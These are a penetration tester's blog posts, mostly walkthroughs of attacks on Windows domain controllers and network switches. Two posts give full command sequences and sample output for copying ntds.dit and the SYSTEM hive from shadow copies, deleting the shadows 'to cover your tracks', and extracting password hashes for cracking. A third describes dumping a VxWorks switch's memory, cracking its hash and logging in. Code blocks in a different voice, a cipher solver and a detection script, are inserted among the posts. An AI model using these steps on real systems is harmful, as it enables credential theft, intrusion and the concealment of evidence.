Starting off 2017 right! (I hope…..)

Well it's 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and with multiple ROCs due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss; hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like; I miss the interactions with other people. Not that I do not like my family, it's just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with what's going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. The first one is an ISO 27001 Lead Auditor certification course; I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if there was space, since I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes; certifications never hurt anyone.

So it looks like the first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice, to get to learn their methodology and show my manager I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do; I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable of being a senior consultant, but if I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, let's hope things keep rolling along smoothly…..

ARCYBER Puzzle

Had a former colleague post a cipher puzzle on a Slack channel I hang out on.

http://www.recruitahacker.net/Puzzle

I figured I would give it a try, since I like to do puzzles.
The site was a link to an ARCYBER web site:

Looking at the cipher text, I was like you have to be kidding me. This is too easy, so I ran it through a script I made a few years back to break vigenère ciphers for another puzzle I had worked.

While the script is not perfect, it was able to decode this cipher text.

Eexl fmoi! 
Well done!

Jabnh gsl’ze decbjrx lvtv, gsl uak hctf xyw gvltpj 
Since you’re reading this, you may have the skills

inp mqrjzrlwzq bs awiz tjc Bvdq hpdu! 
and motivation to join the Army team
Pvirz mqpf esgie bwyi xofeprjec xiexzi nqtt ATAZFVJ.
Learn more about your potential future with ARCYBER.

KEY:
iamacybersoldier

So putting the key into the website you get the full response.
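The decode above is ordinary Vigenère with the key advancing only on letters, so punctuation, spaces and line breaks pass straight through. The block below is an added example, not the author's script: it decrypts and re-encrypts the posted ciphertext with the posted key, and shows how a known crib such as the "Well done!" greeting leaks key letters (the curly apostrophe is written as ASCII here).

```python
"""Vigenere decrypt/encrypt that keeps case and punctuation and only advances the key on
letters, plus known-plaintext key recovery, checked against the ARCYBER puzzle text."""
import string

ALPHABET = string.ascii_lowercase

# Ciphertext and key as posted in the puzzle write-up (apostrophe written as ASCII).
CIPHERTEXT = ("Eexl fmoi!\n"
              "Jabnh gsl'ze decbjrx lvtv, gsl uak hctf xyw gvltpj\n"
              "inp mqrjzrlwzq bs awiz tjc Bvdq hpdu!\n"
              "Pvirz mqpf esgie bwyi xofeprjec xiexzi nqtt ATAZFVJ.")
KEY = "iamacybersoldier"


def _shift(text, key, direction):
    """Shift every ASCII letter by the next key letter. Non-letters pass through untouched
    and do not consume a key position, which is how the puzzle is keyed across words
    and lines. direction is -1 to decrypt, +1 to encrypt."""
    if not key or any(ch not in string.ascii_letters for ch in key):
        raise ValueError("key must contain ASCII letters only")
    key = key.lower()
    out, k = [], 0
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = ALPHABET.index(key[k % len(key)])
            out.append(chr((ord(ch) - base + direction * shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_decrypt(ciphertext, key):
    return _shift(ciphertext, key, -1)


def vigenere_encrypt(plaintext, key):
    return _shift(plaintext, key, +1)


def recover_key(ciphertext, known_plaintext):
    """Known-plaintext recovery: each aligned letter pair leaks one key letter
    (key = cipher - plain mod 26). The key is the shortest period that explains the
    whole leaked stream; if the crib is shorter than the key only a fragment comes back."""
    c_letters = [c for c in ciphertext if c in string.ascii_letters]
    p_letters = [p for p in known_plaintext if p in string.ascii_letters]
    stream = [ALPHABET[(ord(c.lower()) - ord(p.lower())) % 26]
              for c, p in zip(c_letters, p_letters)]
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - period] for i in range(period, len(stream))):
            return "".join(stream[:period])
    return ""


if __name__ == "__main__":
    print(vigenere_decrypt(CIPHERTEXT, KEY))
    print("key from greeting only:", recover_key("Eexl fmoi!", "Well done!"))
```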

You got a link to email someone that you solved the puzzle.

So I was like sure, what could it hurt, might get an offer to apply for some cool jobs with the government (not really).

The response to my email saying I had solved the puzzle:

Congratulations on solving the puzzle and for your interest in the Army’s cyber mission. We ask that you fill out a form found at http://www.goarmy.com/info/send1/?iom=GT45-FY16-ACNP-OT-XXX-XX-XXX-CP-XX-X-XXX   so we can continue discussions about how you can best fit into our Army’s cyber professional workforce. We thank you for your inquiry and are committed to providing information as it becomes available. You may check out our website for the latest cyber career field updates at www.arcyber.army.mil.
v/r,
Mike Milord
Public Affairs Specialist
Army Cyber Command
8605 6th Armored Cavalry Road
Fort Meade, MD 20755
301-833-2007
michael.o.milord.civ@mail.mil

It takes you to the Army website to request information to join.
I figure since I already have 24 years of service in the military they will not want me.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:\>vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:\>vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLM\SYSTEM c:\SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
  • libesedb
  • ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
Running esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
--sid <user sid>
List user identified by SID
--guid <user guid>
List user identified by GUID
--name <user name regexp>
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
--debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from the system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>
(Add --passwordhistory to get previous hashes for each user; the number of hashes per user will vary based on the Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…

Derbycon 4.0

Well Derbycon 4.0 is over, and now things have to go back to normal.
My boss has already scheduled me 3 new projects, and I have not finished last week's projects because I was too excited to get to Derbycon.
Completed the Urban Bourbon Trail (all in half a day, which I do not recommend unless you have the full day). Started at 2pm on Thursday after arriving at the Hyatt in Louisville, KY, and was done by 8pm that night. Felt terrible most of Friday morning, but it did not stop me from getting in on the CTF.
Had a blast at Derbycon, spent most of my time playing CTF and hanging out with friends.
Team nanerpwn came in 2nd place in the CTF, and we had a good lead for most of the time on Friday and Saturday. Could not hold on to the lead towards the end, had a few people drop off to head back home early. So maybe next year we will come in 1st, if we can get everyone to stay until Sunday afternoon.
Ready for Derbycon 5.0

Getting Hashes from NTDS.dit file

Read a write-up from @Mubix about doing this and noticed that some changes had come to the NTDSxtract software which made things a little easier, so I decided to do a write-up on the two versions.
Why do you want to do this anyway?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (could set off alerts) and need password hashes; or you need a password for another account to access data you want (i.e. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)
I would also recommend getting a current copy of SYSTEM from the registry just in case.
reg SAVE HKLM\SYSTEM c:\SYS
I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like ‘/usr/local/’
# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd "NTDSXtract 1.0/"
To update to the new 1.2 Beta version, unzip the contents inside the “NTDSXtract 1.0” directory
(You might want to rename the directory to just NTDSXtract)
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsusers.py (Version 1.0 and 1.2 Beta)

Ver 1.0
# python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py <datatable> <linktable> [option]
options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--passwordhashes <system hive>
Extract password hashes
--passwordhistory <system hive>
Extract password history
--certificates
Extract certificates
--supplcreds <system hive>
Extract kerberos keys
--membership
List groups of which the user is a member
Ver 1.2
# python "../NTDSXtract 1.0/dsusers.py"
DSUsers v1.2
Extracts information related to user objects
usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its
cache files and output files. If the directory does not exist
it will be created.

options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile <name of the LM hash output file>
--ntoutfile <name of the NT hash output file>
--pwdformat <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ~/sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
….(Continues for each Account)….
Ver 1.2 (Output in JTR Format)
python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
….(Continues for each Account)….
Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.
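From the defender's side, the collection chain both NTDS.dit posts walk through (shadow copy created, ntds.dit and SYSTEM copied out of it, SYSTEM saved from the registry, shadow copy deleted) leaves a distinctive trail in process-creation logs (Security 4688 or Sysmon EventID 1 command lines). The block below is an added example, not code from the posts: the log layout, host and user names are constructed, and the rule weights, 30-minute window and alert threshold are my own assumptions.

```python
"""Flag the shadow-copy / ntds.dit / SYSTEM-hive collection chain in process-creation logs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation events: time|host|user|command line.
# DC01 mirrors the steps in the posts; BKP01 is a backup job that only creates and
# removes a shadow copy and should stay below the alert threshold.
SAMPLE_LOG = r"""
2017-01-03T02:10:05|DC01|CORP\svc-backup|vssadmin list shadows
2017-01-03T02:11:40|DC01|CORP\jdoe|vssadmin create shadow /for=C:
2017-01-03T02:12:02|DC01|CORP\jdoe|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\Windows\Temp\ntds.dit
2017-01-03T02:12:15|DC01|CORP\jdoe|cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SYSTEM C:\Windows\Temp\SYSTEM
2017-01-03T02:12:30|DC01|CORP\jdoe|reg SAVE HKLM\SYSTEM C:\Windows\Temp\SYS
2017-01-03T02:13:00|DC01|CORP\jdoe|vssadmin delete shadows /for=C: /shadow={e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
2017-01-03T03:00:00|BKP01|CORP\svc-backup|vssadmin create shadow /for=D:
2017-01-03T03:20:00|BKP01|CORP\svc-backup|vssadmin delete shadows /for=D: /oldest
2017-01-03T09:00:00|WS042|CORP\asmith|vssadmin list shadows
"""

# Rule name -> (pattern over the command line, weight). Weights favour the steps that
# touch the credential material over plain shadow-copy housekeeping (assumed values).
RULES = {
    "vss_create": (re.compile(r"vssadmin(?:\.exe)?\s+create\s+shadow", re.I), 2),
    "vss_delete": (re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I), 2),
    "ntds_from_shadow": (re.compile(r"harddiskvolumeshadowcopy\d+\\.*ntds\.dit", re.I), 4),
    "system_hive_from_shadow": (
        re.compile(r"harddiskvolumeshadowcopy\d+\\.*\\config\\system(?:\s|$)", re.I), 3),
    "reg_save_system": (re.compile(r"\breg(?:\.exe)?\s+save\s+hklm[\\/]system\b", re.I), 3),
}


def parse_events(text):
    """Turn the pipe-separated sample into dicts with a parsed timestamp."""
    events = []
    for line in text.strip().splitlines():
        when, host, user, cmd = line.split("|", 3)
        events.append({"time": datetime.fromisoformat(when), "host": host,
                       "user": user, "cmd": cmd})
    return events


def match_rules(cmd):
    """Names of every rule whose pattern appears in one command line."""
    return [name for name, (pattern, _) in RULES.items() if pattern.search(cmd)]


def correlate(events, window=timedelta(minutes=30), threshold=6):
    """Per host, score the distinct rules seen inside any sliding window and report
    hosts at or above the threshold. Each rule counts once, so a backup job's repeated
    create/delete pairs never accumulate into an alert on their own."""
    hits = defaultdict(list)
    for ev in events:
        names = match_rules(ev["cmd"])
        if names:
            hits[ev["host"]].append((ev["time"], ev["user"], names))
    findings = {}
    for host, host_hits in hits.items():
        host_hits.sort(key=lambda h: h[0])
        best = None
        for i, (start, _, _) in enumerate(host_hits):
            rules, users = set(), set()
            for when, user, names in host_hits[i:]:
                if when - start > window:
                    break
                rules.update(names)
                users.add(user)
            score = sum(RULES[name][1] for name in rules)
            if best is None or score > best["score"]:
                best = {"score": score, "rules": sorted(rules), "users": sorted(users),
                        "window_start": start.isoformat()}
        if best and best["score"] >= threshold:
            findings[host] = best
    return findings


if __name__ == "__main__":
    for host, finding in correlate(parse_events(SAMPLE_LOG)).items():
        print(host, finding)
```

Legitimate shadow-copy users (backup agents, vssadmin list) only score on the housekeeping rules, so the high-weight rules are the ones that fire on a real ntds.dit copy.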

VxWorks Memory Dump

While running an internal vulnerability scan I noticed that one of the devices was showing vulnerable to VxWorks Memory Dump.
This is exploitable by using the Metasploit wdbrpc_memory_dump module, so I fired it up and loaded the module to see if I could pull the memory from this device.
[screenshot: vxworks]
I ran the exploit against the system and it began dumping the memory, and it got to about 31% before stopping, so I had to restart it from the OFFSET value it stopped at. This happened 3 more times before it finished. The output file was about 256MB in size, so I was not sure if it had good information from the system or just crap.
Being that it was a hex dump of the memory, I ran strings against the file to get a list of information and look for possible information to use. I put the output into another file to search through with “grep”.
# strings vxworks_memory.dmp > strings.memory.dmp
I was able to determine that it was a network switch from viewing the IP address on port 80 (looked back at Nessus to see what ports were open and what it thought the device was), so I decided to search for words like “password”, “enable”, and “encryption”.
At first nothing showed up that was any good or valuable to use, so I decided to search for partial words, like “assw”, “able” and “crypt” to see if the words had been split across lines in the memory dump.
# cat strings.memory.dmp | grep -i assw
# cat strings.memory.dmp | grep -i crypt
I discovered that the enable hash was in the dump, so I guessed that the password could also be stored in there as well.
Taking the new file from the strings output (strings.memory.dmp), I ran it through “sort” with the unique flag and output that into another file to use as my password list starting point.
# cat strings.memory.dmp | sort -u > passlist.list
With a new list of possible passwords, and hoping that one copy of it was completely intact and not split across a line, I ran it through PW-Inspector to narrow it down to a more manageable number of realistic passwords of a realistic length.
# pw-inspector -i passlist.list -o passlist.uniq.list -lunps -m 8 -M 16
Now that I had narrowed the password list down to a more manageable solution, I ran John against the hash with the shorter list.
[screenshot: john_vxworks]
In no time at all I had the password for the hash, the switch was not Cisco and was only using an MD5 hash, which made it rather simple to crack.
Now that I had the password, I needed to search for a user name. So I started searching for common names in the file, and admin came back multiple times with the word user next to it, so with a little searching on Google, I discovered that admin was the default user on this switch.
From there I tried to SSH to the switch, but was denied due to the use of private keys and not passwords for SSH, so I tried telnet to connect to the switch and was able to login.
From there I had access to see all of the other VLANs and IP address space that I did not have access to before. Now time to see where else the password is used.

Fun times during NVA/PT assessments over the past 3 months

Some fun things I have had to deal with during some NVA/PT assessments for customers over the past 3 months.
You begin scanning 5 hosts and the customer's switch rolls over, everything stops responding, and the customer calls you asking what you did.
I enjoy customers that leave usernames and passwords for critical systems on a web page with unauthenticated access, and they say that it is not a security vulnerability.
